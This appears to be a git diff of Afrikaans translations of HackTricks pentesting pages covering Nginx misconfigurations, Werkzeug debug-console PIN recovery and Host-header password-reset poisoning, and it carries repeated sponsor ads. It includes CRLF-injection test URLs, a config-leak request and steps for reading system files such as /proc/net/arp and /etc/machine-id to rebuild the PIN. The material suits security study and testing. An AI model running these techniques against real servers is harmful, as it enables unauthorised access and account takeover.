**Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle terug 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -34,7 +34,7 @@ proxy_pass http://127.0.0.1:8080/;
} }
} }
``` ```
In hierdie konfigurasie is `/etc/nginx` aangewys as die wortelgids. Hierdie opstelling stel toegang tot lêers binne die gespesifiseerde wortelgids, soos `/hello.txt`, in staat. Dit is egter van kardinale belang om te noem dat slegs 'n spesifieke ligging (`/hello.txt`) gedefinieer is. Daar is geen konfigurasie vir die wortel ligging nie (`location / {...}`). Hierdie omissie beteken dat die wortelriglyn globaal van toepassing is, wat versoeke na die wortelpunt `/` in staat stel om lêers onder `/etc/nginx` te benader. In hierdie konfigurasie is `/etc/nginx` as die wortelgids aangewys. Hierdie opstelling stel toegang tot lêers binne die gespesifiseerde wortelgids, soos `/hello.txt`, in staat. Dit is egter belangrik om te noem dat slegs 'n spesifieke ligging (`/hello.txt`) gedefinieer is. Daar is geen konfigurasie vir die wortel ligging nie (`location / {...}`). Hierdie omissie beteken dat die wortelriglyn globaal van toepassing is, wat versoeke na die wortelpad `/` in staat stel om lêers onder `/etc/nginx` te benader.
'n Kritieke sekuriteitsoorweging ontstaan uit hierdie konfigurasie. 'n Eenvoudige `GET` versoek, soos `GET /nginx.conf`, kan sensitiewe inligting blootstel deur die Nginx konfigurasielêer wat geleë is by `/etc/nginx/nginx.conf` te bedien. Om die wortel na 'n minder sensitiewe gids, soos `/etc`, in te stel, kan hierdie risiko verminder, maar dit mag steeds onbedoelde toegang tot ander kritieke lêers, insluitend ander konfigurasielêers, toeganglogs en selfs versleutelde akrediteerings wat vir HTTP basiese outentisering gebruik word, toelaat. 'n Kritieke sekuriteitsoorweging ontstaan uit hierdie konfigurasie. 'n Eenvoudige `GET` versoek, soos `GET /nginx.conf`, kan sensitiewe inligting blootstel deur die Nginx konfigurasielêer wat geleë is by `/etc/nginx/nginx.conf` te bedien. Om die wortel na 'n minder sensitiewe gids, soos `/etc`, in te stel, kan hierdie risiko verminder, maar dit mag steeds onbedoelde toegang tot ander kritieke lêers, insluitend ander konfigurasielêers, toeganglogs en selfs versleutelde akrediteerings wat vir HTTP basiese outentisering gebruik word, toelaat.
@ -94,13 +94,13 @@ Kwetsbare veranderlikes `$uri` en `$document_uri` en dit kan reggestel word deur
`location ~ /docs/(.*)? { … $1 … }` - Nie kwesbaar nie `location ~ /docs/(.*)? { … $1 … }` - Nie kwesbaar nie
{% endhint %} {% endhint %}
'n Kwetsbaarheid in Nginx-konfigurasie word demonstreer deur die voorbeeld hieronder: 'n Kwetsbaarheid in Nginx-konfigurasie word gedemonstreer deur die voorbeeld hieronder:
``` ```
location / { location / {
return 302 https://example.com$uri; return 302 https://example.com$uri;
} }
``` ```
Die karakters \r (Carriage Return) en \n (Line Feed) dui nuwe lyn karakters in HTTP versoeke aan, en hul URL-gecodeerde vorms word voorgestel as `%0d%0a`. Om hierdie karakters in 'n versoek in te sluit (bv. `http://localhost/%0d%0aDetectify:%20clrf`) na 'n verkeerd geconfigureerde bediener lei tot die bediener wat 'n nuwe kop genaamd `Detectify` uitreik. Dit gebeur omdat die $uri veranderlike die URL-gecodeerde nuwe lyn karakters decodeer, wat lei tot 'n onverwagte kop in die antwoord: Die karakters \r (Carriage Return) en \n (Line Feed) dui nuwe lyn karakters aan in HTTP versoeke, en hul URL-gecodeerde vorms word voorgestel as `%0d%0a`. Om hierdie karakters in 'n versoek in te sluit (bv. `http://localhost/%0d%0aDetectify:%20clrf`) na 'n verkeerd geconfigureerde bediener lei tot die bediener wat 'n nuwe kop genaamd `Detectify` uitreik. Dit gebeur omdat die $uri veranderlike die URL-gecodeerde nuwe lyn karakters decodeer, wat lei tot 'n onverwagte kop in die antwoord:
``` ```
HTTP/1.1 302 Moved Temporarily HTTP/1.1 302 Moved Temporarily
Server: nginx/1.19.3 Server: nginx/1.19.3
@ -112,21 +112,21 @@ Detectify: clrf
``` ```
Leer meer oor die risiko's van CRLF-inspuiting en antwoordsplitsing by [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/). Leer meer oor die risiko's van CRLF-inspuiting en antwoordsplitsing by [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/).
Ook hierdie tegniek is [**verduidelik in hierdie praatjie**](https://www.youtube.com/watch?v=gWQyWdZbdoY\&list=PL0xCSYnG\_iTtJe2V6PQqamBF73n7-f1Nr\&index=77) met 'n paar kwesbare voorbeelde en opsporingsmeganismes. Byvoorbeeld, om hierdie verkeerde konfigurasie vanuit 'n swartdoos perspektief op te spoor, kan jy hierdie versoeke gebruik: Ook hierdie tegniek is [**verduidelik in hierdie praatjie**](https://www.youtube.com/watch?v=gWQyWdZbdoY\&list=PL0xCSYnG\_iTtJe2V6PQqamBF73n7-f1Nr\&index=77) met 'n paar kwesbare voorbeelde en opsporingsmeganismes. Byvoorbeeld, om hierdie miskonfigurasie vanuit 'n swartdoos perspektief op te spoor, kan jy hierdie versoeke gebruik:
* `https://example.com/%20X` - Enige HTTP-kode * `https://example.com/%20X` - Enige HTTP-kode
* `https://example.com/%20H` - 400 Bad Request * `https://example.com/%20H` - 400 Bad Request
As kwesbaar, sal die eerste terugkeer as "X" is enige HTTP-metode en die tweede sal 'n fout teruggee aangesien H nie 'n geldige metode is nie. So die bediener sal iets soos ontvang: `GET / H HTTP/1.1` en dit sal die fout aktiveer. As kwesbaar, sal die eerste terugkeer as "X" enige HTTP-metode is en die tweede sal 'n fout teruggee aangesien H nie 'n geldige metode is nie. So die bediener sal iets soos ontvang: `GET / H HTTP/1.1` en dit sal die fout aktiveer.
Nog 'n opsporingsvoorbeeld sou wees: Nog 'n opsporingsvoorbeeld kan wees:
* `http://company.tld/%20HTTP/1.1%0D%0AXXXX:%20x` - Enige HTTP-kode * `http://company.tld/%20HTTP/1.1%0D%0AXXXX:%20x` - Enige HTTP-kode
* `http://company.tld/%20HTTP/1.1%0D%0AHost:%20x` - 400 Bad Request * `http://company.tld/%20HTTP/1.1%0D%0AHost:%20x` - 400 Bad Request
Sommige gevonde kwesbare konfigurasies wat in daardie praatjie aangebied is, was: Sommige gevonde kwesbare konfigurasies wat in daardie praatjie aangebied is, was:
* Let op hoe **`$uri`** as is in die finale URL gestel is. * Let op hoe **`$uri`** soos dit is in die finale URL gestel is.
``` ```
location ^~ /lite/api/ { location ^~ /lite/api/ {
proxy_pass http://lite-backend$uri$is_args$args; proxy_pass http://lite-backend$uri$is_args$args;
@ -152,7 +152,7 @@ Om **hierdie miskonfigurasie te ontdek**, kan die volgende opdrag uitgevoer word
```bash ```bash
$ curl -H Referer: bar http://localhost/foo$http_referer | grep foobar $ curl -H Referer: bar http://localhost/foo$http_referer | grep foobar
``` ```
Scans vir hierdie misconfigurasie oor stelsels het verskeie gevalle onthul waar Nginx veranderlikes deur 'n gebruiker gedruk kon word. 'n Afname in die aantal kwesbare gevalle dui egter daarop dat pogings om hierdie probleem reg te stel, tot 'n mate suksesvol was. Scans vir hierdie miskonfigurasie oor stelsels het verskeie gevalle onthul waar Nginx veranderlikes deur 'n gebruiker gedruk kon word. 'n Afname in die aantal kwesbare gevalle dui egter daarop dat pogings om hierdie probleem reg te stel, tot 'n mate suksesvol was.
## Rau backend respons lees ## Rau backend respons lees
@ -179,9 +179,9 @@ Wanneer 'n geldige `GET` versoek gemaak word, verwerk Nginx dit normaalweg, en k
## merge\_slashes op af ## merge\_slashes op af
Standaard is Nginx se **`merge_slashes` riglyn** op **`aan`** gestel, wat verskeie voorwaartse skuinsstrepies in 'n URL in 'n enkele skuinsstreep saampers. Hierdie kenmerk, terwyl dit URL-verwerking stroomlyn, kan onbedoeld kwesbaarhede in toepassings agter Nginx verberg, veral dié wat geneig is tot plaaslike lêerinvoeging (LFI) aanvalle. Sekuriteitskenners **Danny Robinson en Rotem Bar** het die potensiële risiko's wat met hierdie standaardgedrag geassosieer word, beklemtoon, veral wanneer Nginx as 'n omgekeerde proxy optree. Standaard is Nginx se **`merge_slashes` riglyn** op **`aan`** gestel, wat verskeie vorentoe-skuins in 'n URL in 'n enkele skuins saampers. Hierdie kenmerk, terwyl dit URL-verwerking stroomlyn, kan onbedoeld kwesbaarhede in toepassings agter Nginx verberg, veral dié wat geneig is tot plaaslike lêerinvoeging (LFI) aanvalle. Sekuriteitskenners **Danny Robinson en Rotem Bar** het die potensiële risiko's wat met hierdie standaardgedrag geassosieer word, beklemtoon, veral wanneer Nginx as 'n omgekeerde proxy optree.
Om sulke risiko's te verminder, word dit aanbeveel om die **`merge_slashes` riglyn af te skakel** vir toepassings wat vatbaar is vir hierdie kwesbaarhede. Dit verseker dat Nginx versoeke aan die toepassing deurgee sonder om die URL-struktuur te verander, en dus nie enige onderliggende sekuriteitskwessies te verberg nie. Om sulke risiko's te verminder, word dit aanbeveel om **die `merge_slashes` riglyn af te skakel** vir toepassings wat vatbaar is vir hierdie kwesbaarhede. Dit verseker dat Nginx versoeke aan die toepassing deurgee sonder om die URL-struktuur te verander, en dus nie enige onderliggende sekuriteitskwessies te verberg nie.
Vir meer inligting, kyk na [Danny Robinson en Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d). Vir meer inligting, kyk na [Danny Robinson en Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d).
@ -189,7 +189,7 @@ Vir meer inligting, kyk na [Danny Robinson en Rotem Bar](https://medium.com/apps
Soos getoon in [**hierdie skrywe**](https://mizu.re/post/cors-playground), is daar sekere koptekste wat, indien teenwoordig in die antwoord van die webbediener, die gedrag van die Nginx-proxy sal verander. Jy kan hulle [**in die dokumentasie**](https://www.nginx.com/resources/wiki/start/topics/examples/x-accel/) nagaan: Soos getoon in [**hierdie skrywe**](https://mizu.re/post/cors-playground), is daar sekere koptekste wat, indien teenwoordig in die antwoord van die webbediener, die gedrag van die Nginx-proxy sal verander. Jy kan hulle [**in die dokumentasie**](https://www.nginx.com/resources/wiki/start/topics/examples/x-accel/) nagaan:
* `X-Accel-Redirect`: Dui aan Nginx om 'n versoek intern na 'n gespesifiseerde ligging te herlei. * `X-Accel-Redirect`: Gee aan Nginx om intern 'n versoek na 'n gespesifiseerde ligging te herlei.
* `X-Accel-Buffering`: Beheer of Nginx die antwoord moet buffere of nie. * `X-Accel-Buffering`: Beheer of Nginx die antwoord moet buffere of nie.
* `X-Accel-Charset`: Stel die karakterstel vir die antwoord in wanneer X-Accel-Redirect gebruik word. * `X-Accel-Charset`: Stel die karakterstel vir die antwoord in wanneer X-Accel-Redirect gebruik word.
* `X-Accel-Expires`: Stel die vervaldatum vir die antwoord in wanneer X-Accel-Redirect gebruik word. * `X-Accel-Expires`: Stel die vervaldatum vir die antwoord in wanneer X-Accel-Redirect gebruik word.
@ -218,11 +218,11 @@ return 200 "Hello. It is private area: $mappocallow";
} }
} }
``` ```
Without a `default`, a **malicious user** kan sekuriteit omseil deur toegang te verkry tot 'n **onbeskryfde URI** binne `/map-poc`. [Die Nginx-handleiding](https://nginx.org/en/docs/http/ngx\_http\_map\_module.html) beveel aan om 'n **standaardwaarde** in te stel om sulke probleme te vermy. Without a `default`, a **malicious user** can bypass security by accessing an **undefined URI** within `/map-poc`. [The Nginx manual](https://nginx.org/en/docs/http/ngx\_http\_map\_module.html) advises setting a **default value** to avoid such issues.
### **DNS Spoofing Kwesbaarheid** ### **DNS Spoofing Kwetsbaarheid**
DNS spoofing teen Nginx is haalbaar onder sekere omstandighede. As 'n aanvaller die **DNS-server** wat deur Nginx gebruik word, ken en sy DNS-vrae kan onderskep, kan hulle DNS-rekords spoof. Hierdie metode is egter ondoeltreffend as Nginx geconfigureer is om **localhost (127.0.0.1)** vir DNS-resolusie te gebruik. Nginx laat toe om 'n DNS-server soos volg te spesifiseer: DNS spoofing teen Nginx is haalbaar onder sekere omstandighede. As 'n aanvaller die **DNS-bediener** wat deur Nginx gebruik word, ken en sy DNS-vrae kan onderskep, kan hulle DNS-rekords spoof. Hierdie metode is egter ondoeltreffend as Nginx geconfigureer is om **localhost (127.0.0.1)** vir DNS-resolusie te gebruik. Nginx laat toe om 'n DNS-bediener soos volg te spesifiseer:
```yaml ```yaml
resolver 8.8.8.8; resolver 8.8.8.8;
``` ```
@ -232,7 +232,7 @@ Die **`proxy_pass`** direktief word gebruik om versoeke na ander bedieners te he
## proxy\_set\_header Upgrade & Connection ## proxy\_set\_header Upgrade & Connection
As die nginx bediener geconfigureer is om die Upgrade en Connection headers oor te dra, kan 'n [**h2c Smuggling aanval**](../../pentesting-web/h2c-smuggling.md) uitgevoer word om toegang te verkry tot beskermde/internale eindpunte. As die nginx bediener geconfigureer is om die Upgrade en Connection headers oor te dra, kan 'n [**h2c Smuggling aanval**](../../pentesting-web/h2c-smuggling.md) uitgevoer word om toegang te verkry tot beskermde/intern eindpunte.
{% hint style="danger" %} {% hint style="danger" %}
Hierdie kwesbaarheid sou 'n aanvaller in staat stel om **'n direkte verbinding met die `proxy_pass` eindpunt te vestig** (`http://backend:9999` in hierdie geval) waarvan die inhoud nie deur nginx gaan nagegaan word nie. Hierdie kwesbaarheid sou 'n aanvaller in staat stel om **'n direkte verbinding met die `proxy_pass` eindpunt te vestig** (`http://backend:9999` in hierdie geval) waarvan die inhoud nie deur nginx gaan nagegaan word nie.
@ -259,7 +259,7 @@ deny all;
} }
``` ```
{% hint style="warning" %} {% hint style="warning" %}
Let daarop dat selfs al die `proxy_pass` na 'n spesifieke **pad** soos `http://backend:9999/socket.io` gewys het, die verbinding met `http://backend:9999` tot stand sal kom, sodat jy **enige ander pad binne daardie interne eindpunt kan kontak. Dit maak nie saak of 'n pad in die URL van proxy\_pass gespesifiseer is nie.** Let daarop dat selfs al was die `proxy_pass` op 'n spesifieke **pad** soos `http://backend:9999/socket.io` gemik, die verbinding sal gevestig word met `http://backend:9999` sodat jy **enige ander pad binne daardie interne eindpunt kan kontak. Dit maak nie saak of 'n pad in die URL van proxy\_pass gespesifiseer is nie.**
{% endhint %} {% endhint %}
## Probeer dit self ## Probeer dit self
@ -268,7 +268,7 @@ Detectify het 'n GitHub-repo geskep waar jy Docker kan gebruik om jou eie kwesba
[https://github.com/detectify/vulnerable-nginx](https://github.com/detectify/vulnerable-nginx) [https://github.com/detectify/vulnerable-nginx](https://github.com/detectify/vulnerable-nginx)
## Statiese ontleder gereedskap ## Statiese Analiseer gereedskap
### [GIXY](https://github.com/yandex/gixy) ### [GIXY](https://github.com/yandex/gixy)
@ -284,9 +284,9 @@ Nginxpwner is 'n eenvoudige hulpmiddel om te soek na algemene Nginx-miskonfigura
* [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/) * [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)
* [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115) * [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

View file

@ -15,9 +15,9 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheid assessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -43,29 +43,29 @@ The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your You can find the PIN printed out on the standard output of your
shell that runs the server shell that runs the server
``` ```
'n Boodskap rakende die "konsole vergrendel" scenario word teëgekom wanneer daar probeer word om toegang te verkry tot Werkzeug se foutopsporing koppelvlak, wat 'n vereiste vir 'n PIN aandui om die konsole te ontgrendel. Die voorstel word gemaak om die konsole PIN te benut deur die PIN generasie-algoritme in Werkzeug se foutopsporing inisialiseringslêer (`__init__.py`) te analiseer. Die PIN generasie-meganisme kan bestudeer word vanaf die [**Werkzeug bronkode-bewaarplek**](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\_\_init\_\_.py), alhoewel dit aanbeveel word om die werklike bediener kode te verkry deur 'n lêer traversering kwesbaarheid weens moontlike weergawe verskille. 'n Boodskap rakende die "konsole vergrendel" scenario word teëgekom wanneer daar probeer word om toegang te verkry tot Werkzeug se foutopsporing koppelvlak, wat 'n vereiste vir 'n PIN aandui om die konsole te ontgrendel. Die voorstel word gemaak om die konsole PIN te benut deur die PIN generasie algoritme in Werkzeug se foutopsporing inisialiseringslêer (`__init__.py`) te analiseer. Die PIN generasie meganisme kan bestudeer word vanaf die [**Werkzeug bronkode-bewaarplek**](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\_\_init\_\_.py), alhoewel dit aanbeveel word om die werklike bediener kode te verkry via 'n lêer traversering kwesbaarheid weens moontlike weergawe verskille.
Om die konsole PIN te benut, is twee stelle veranderlikes, `probably_public_bits` en `private_bits`, nodig: Om die konsole PIN te benut, is twee stelle veranderlikes, `probably_public_bits` en `private_bits`, nodig:
#### **`probably_public_bits`** #### **`probably_public_bits`**
* **`username`**: Verwys na die gebruiker wat die Flask-sessie begin het. * **`username`**: Verwys na die gebruiker wat die Flask sessie begin het.
* **`modname`**: Gewoonlik aangewys as `flask.app`. * **`modname`**: Gewoonlik aangewys as `flask.app`.
* **`getattr(app, '__name__', getattr(app.__class__, '__name__'))`**: Oor die algemeen los dit op na **Flask**. * **`getattr(app, '__name__', getattr(app.__class__, '__name__'))`**: Oor die algemeen los dit op na **Flask**.
* **`getattr(mod, '__file__', None)`**: Verteenwoordig die volle pad na `app.py` binne die Flask-gids (bv. `/usr/local/lib/python3.5/dist-packages/flask/app.py`). As `app.py` nie van toepassing is nie, **probeer `app.pyc`**. * **`getattr(mod, '__file__', None)`**: Verteenwoordig die volle pad na `app.py` binne die Flask gids (bv. `/usr/local/lib/python3.5/dist-packages/flask/app.py`). As `app.py` nie van toepassing is nie, **probeer `app.pyc`**.
#### **`private_bits`** #### **`private_bits`**
* **`uuid.getnode()`**: Verkry die MAC-adres van die huidige masjien, met `str(uuid.getnode())` wat dit in 'n desimale formaat vertaal. * **`uuid.getnode()`**: Verkry die MAC adres van die huidige masjien, met `str(uuid.getnode())` wat dit in 'n desimale formaat vertaal.
* Om **die bediener se MAC-adres te bepaal**, moet 'n aktiewe netwerkinterfase wat deur die app gebruik word, geïdentifiseer word (bv. `ens3`). In gevalle van onsekerheid, **lek `/proc/net/arp`** om die toestel-ID te vind, dan **onttrek die MAC-adres** van **`/sys/class/net/<device id>/address`**. * Om **die bediener se MAC adres te bepaal**, moet een die aktiewe netwerk interfase wat deur die app gebruik word, identifiseer (bv. `ens3`). In gevalle van onsekerheid, **lek `/proc/net/arp`** om die toestel ID te vind, dan **onttrek die MAC adres** van **`/sys/class/net/<device id>/address`**.
* Om 'n heksadesimale MAC-adres na desimaal om te skakel kan soos hieronder gedoen word: * Om 'n hexadesimale MAC adres na desimaal om te skakel kan soos hieronder gedoen word:
```python ```python
# Voorbeeld MAC-adres: 56:00:02:7a:23:ac # Voorbeeld MAC adres: 56:00:02:7a:23:ac
>>> print(0x5600027a23ac) >>> print(0x5600027a23ac)
94558041547692 94558041547692
``` ```
* **`get_machine_id()`**: Kombineer data van `/etc/machine-id` of `/proc/sys/kernel/random/boot_id` met die eerste lyn van `/proc/self/cgroup` na die laaste skuinsstreep (`/`). * **`get_machine_id()`**: Voeg data van `/etc/machine-id` of `/proc/sys/kernel/random/boot_id` saam met die eerste lyn van `/proc/self/cgroup` na die laaste skuinsstreep (`/`).
<details> <details>
@ -165,7 +165,7 @@ As jy op 'n **ou weergawe** van Werkzeug is, probeer om die **hashing-algoritme
## Werkzeug Unicode karakters ## Werkzeug Unicode karakters
Soos waargeneem in [**hierdie probleem**](https://github.com/pallets/werkzeug/issues/2833), sluit Werkzeug nie 'n versoek met Unicode karakters in headers nie. En soos verduidelik in [**hierdie skrywe**](https://mizu.re/post/twisty-python), kan dit 'n CL.0 Request Smuggling kwesbaarheid veroorsaak. Soos waargeneem in [**hierdie probleem**](https://github.com/pallets/werkzeug/issues/2833), sluit Werkzeug nie 'n versoek met Unicode karakters in headers. En soos verduidelik in [**hierdie skrywe**](https://mizu.re/post/twisty-python), kan dit 'n CL.0 Request Smuggling kwesbaarheid veroorsaak.
Dit is omdat dit in Werkzeug moontlik is om sommige **Unicode** karakters te stuur en dit sal die bediener **breek**. As die HTTP-verbinding egter met die header **`Connection: keep-alive`** geskep is, sal die liggaam van die versoek nie gelees word nie en die verbinding sal steeds oop wees, so die **liggaam** van die versoek sal as die **volgende HTTP versoek** behandel word. Dit is omdat dit in Werkzeug moontlik is om sommige **Unicode** karakters te stuur en dit sal die bediener **breek**. As die HTTP-verbinding egter met die header **`Connection: keep-alive`** geskep is, sal die liggaam van die versoek nie gelees word nie en die verbinding sal steeds oop wees, so die **liggaam** van die versoek sal as die **volgende HTTP versoek** behandel word.
@ -180,7 +180,7 @@ Dit is omdat dit in Werkzeug moontlik is om sommige **Unicode** karakters te stu
* [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833) * [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833)
* [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python) * [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python)
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê.

View file

@ -15,9 +15,9 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer tyd te gee om dieper te delf, shells te pop, en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -26,19 +26,19 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
Verskeie kere vertrou die agterkant op die **Gasheer kop** om sekere aksies uit te voer. Byvoorbeeld, dit kan sy waarde gebruik as die **domein om 'n wagwoordherstel te stuur**. So wanneer jy 'n e-pos ontvang met 'n skakel om jou wagwoord te herstel, is die domein wat gebruik word die een wat jy in die Gasheer kop geplaas het. Dan kan jy die wagwoordherstel van ander gebruikers aanvra en die domein verander na een wat deur jou beheer word om hul wagwoordherstelkodes te steel. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). Verskeie kere vertrou die agterkant op die **Gasheer kop** om sekere aksies uit te voer. Byvoorbeeld, dit kan sy waarde gebruik as die **domein om 'n wagwoordherstel te stuur**. So wanneer jy 'n e-pos ontvang met 'n skakel om jou wagwoord te herstel, is die domein wat gebruik word die een wat jy in die Gasheer kop geplaas het. Dan kan jy die wagwoordherstel van ander gebruikers aanvra en die domein verander na een wat deur jou beheer word om hul wagwoordherstelkodes te steel. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
{% hint style="warning" %} {% hint style="warning" %}
Let daarop dat dit moontlik is dat jy nie eers hoef te wag vir die gebruiker om op die wagwoordherstel skakel te klik om die token te kry nie, aangesien selfs **spamfilters of ander intermediêre toestelle/bots daarop kan klik om dit te analiseer**. Let daarop dat dit moontlik is dat jy selfs nie hoef te wag vir die gebruiker om op die hersteld wagwoord skakel te klik om die token te kry nie, aangesien selfs **spamfilters of ander intermediêre toestelle/bots daarop kan klik om dit te analiseer**.
{% endhint %} {% endhint %}
### Sessie booleans ### Sessie booleans
Soms wanneer jy 'n sekere verifikasie korrek voltooi, sal die agterkant **net 'n boolean met die waarde "True" by 'n sekuriteitsattribuut van jou sessie voeg**. Dan sal 'n ander eindpunt weet of jy daardie toets suksesvol geslaag het.\ Soms wanneer jy 'n sekere verifikasie korrek voltooi, sal die agterkant **net 'n boolean met die waarde "Waar" by 'n sekuriteitsattribuut van jou sessie voeg**. Dan sal 'n ander eindpunt weet of jy daardie toets suksesvol geslaag het.\
